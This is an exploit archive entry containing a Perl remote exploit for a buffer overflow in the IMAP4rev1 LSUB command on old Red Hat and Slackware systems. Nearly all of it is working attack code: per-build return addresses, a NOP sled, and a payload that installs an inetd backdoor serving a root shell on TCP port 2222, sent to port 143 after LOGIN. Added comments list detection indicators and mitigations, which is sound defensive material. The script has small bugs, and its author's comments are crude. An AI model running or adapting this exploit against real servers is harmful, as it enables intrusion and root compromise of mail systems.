IMAP4rev1 remote exploit

Свойства

Дата публикации:
27.08.2002

Код

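IMAP4rev1 remote exploit для RedHat и Slackware Linux. Команда LSUB с переполняющим аргументом отправляется уже после LOGIN, то есть уязвимость затрагивает аутентифицированные сессии; по словам автора, код не тестировался.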

#!/usr/bin/perl
# Once upon a flame came a blue bird...
# i grabbed my rifle and shot the shot the son of a bitch
# the cops came, i ran like hell...
# i fucked my transmission
# ocifer i swear the drunk i'm not god
#
# blah blah blah blahb blah blah blah.... yeha yeah yeah eyah
#
# Imapd Remote sploit... muagahaahah... yeha i know it's gay :)
# Note: This is not tested but should work... i got bored what can i say :)
#
# [ElectronicSouls] - www.electronicsouls.org
# -BuRn-X(burnx@electronicsouls.zzn.com)

use IO::Socket;

# Usage gate: when the fourth argument (Type) is missing or false, print the
# usage line and the table of target builds, then exit before any network
# activity. For defenders, the table is the author's list of affected
# distribution / imapd version pairs and can be used as an audit checklist.
if (!$ARGV[3]) {
print "I'm god i tell yah!!!! i'm god dammit!!!!!\n";
print "Feed Me: ./imapdog.pl [[-Hostname-]] [[-Username-]] [[-Password-]] [[-Type-]] [[-Offset-]]\n\n";
print "Type     System              Version    \n";
print "1       Red Hat 5.1      IMAP4rev1 v10.223\n";
print "2       Red Hat 5.2      IMAP4rev1 v11.241\n";
print "3       Red Hat 6.0      IMAP4rev1 v12.250\n";
print "4       Red Hat 6.1      IMAP4rev1 v12.250\n";
print "5       Red Hat 6.2      IMAP4rev1 v12.264\n";
print "6       Slackware 4.0    IMAP4rev1 v12.250\n";
print "7       Slackware 7.0    IMAP4rev1 v2000.284\n";
print "8       Slackware 7.0    IMAP4rev1 v12.261\n";
print "9       Slackware 7.1    IMAP4rev1 v12.264\n";
exit;
}

# Positional arguments, in the order given by the usage line. The variable
# names are jokes and do not describe their contents:
#   $my     - hostname of the IMAP server (used as PeerAddr)
#   $dog    - username sent in the LOGIN command
#   $is     - password sent in the LOGIN command
#   $really - target type number from the usage table
#   $horny  - numeric offset added to the selected address; undefined when
#             the fifth argument is omitted
# All of these are package globals; the script runs without strict or warnings.
$my = $ARGV[0];
$dog = $ARGV[1];
$is = $ARGV[2];
$really = $ARGV[3];
$horny = $ARGV[4];

# Address table: nine branches, one per row of the usage table, each
# assigning a hard-coded address (as a hex string) to $retaddr.
# NOTE(review): every value lies in the 0xbfffe000-0xbfffffff range, which
# looks like the 32-bit Linux user stack region - presumably per-build
# guesses at the location of the overflowed buffer; confirm against the
# advisory for the affected imapd versions.
# Fixed addresses like these depend on a predictable stack layout. Stack
# address randomisation and a non-executable stack are the generic
# mitigations for this class of payload, alongside updating the IMAP server.
if ( $really eq "1" ) {
$retaddr = "0xbffff31c";
}
if ( $really eq "2" ) {
$retaddr = "0xbffff320";
}
if ( $really eq "3" ) {
$retaddr = "0xbffff2f0";
}
if ( $realy eq "4" ) {
$retaddr = "0xbffff2c4";
}
if ( $really eq "5" ) {
$retaddr = "0xbffff2c8";
}
if ( $really eq "6" ) {
$retaddr = "0xbffff890";
}
if ( $really eq "7" ) {
$retaddr = "0xbfffebc8";
}
if ( $really eq "8" ) {
$retaddr = "0xbffff3ec";
}
if ( $really eq "9" ) {
$retaddr = "0xbffff4e0";
}

# Convert the selected hex string to a number and add the offset argument.
$ret = (hex $retaddr) + $horny;
# pack("l") encodes the value as a signed 32-bit integer in the byte order
# of the machine running the script.
$swoosh = pack("l", $ret);

# 613 bytes of 0x90, the single-byte x86 NOP, used as leading padding.
# A long run of 0x90 inside an IMAP command argument is a classic
# network-signature indicator for this style of overflow attempt.
$girls = "\x90" x 613;

# Niacikatrix Shellcode
# The escaped bytes below are printable ASCII. Decoded verbatim they read:
#   echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tm/ph
# Host-side indicators a responder can look for, taken from that string:
#   - a file /tmp/h containing an inetd service line for port 2222 that
#     runs /bin/sh as root
#   - an extra /usr/sbin/inetd process started with a non-standard
#     configuration path
#   - an unexpected listener on TCP port 2222
$unfcode = "\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72".
             "\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74".
             "\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20".
             "\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f".
             "\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e".
             "\x65\x74\x64\x20\x2f\x74\x6d\x2f\x70\x68";
# Buffer layout, in order: the 0x90 padding, the byte string above, then the
# packed 4-byte address repeated 96 times.
$fluffy .= $girls;
$fluffy .= $unfcode;
$fluffy .= $swoosh x 96;

# Open a TCP connection to port 143 (IMAP) on the given host. The result of
# the constructor is not checked, and no server response is ever read.
$badboy = IO::Socket::INET->new( PeerAddr => "$my", Proto => "tcp", PeerPort => "143");

# Wire sequence, useful for writing IDS rules and for log review:
#   1. LOGIN with the supplied username and password - the overflow is
#      attempted only inside an authenticated session.
#   2. LSUB with an empty reference and the mailbox pattern announced as an
#      IMAP literal, {1064}. Both commands reuse the tag "1".
#   3. The oversized buffer built in $fluffy, sent as the literal's content.
# An LSUB (or similar mailbox-listing) command whose argument is a literal of
# roughly a kilobyte, made up mostly of 0x90 bytes, is anomalous for normal
# mail clients and is a reasonable detection point. Servers running the
# imapd builds listed in the usage table should be upgraded to a fixed
# release.
print $badboy "1 LOGIN $dog $is\r\n";
print $badboy "1 LSUB \"\" {1064}\n";
print $badboy "$fluffy\r\n";

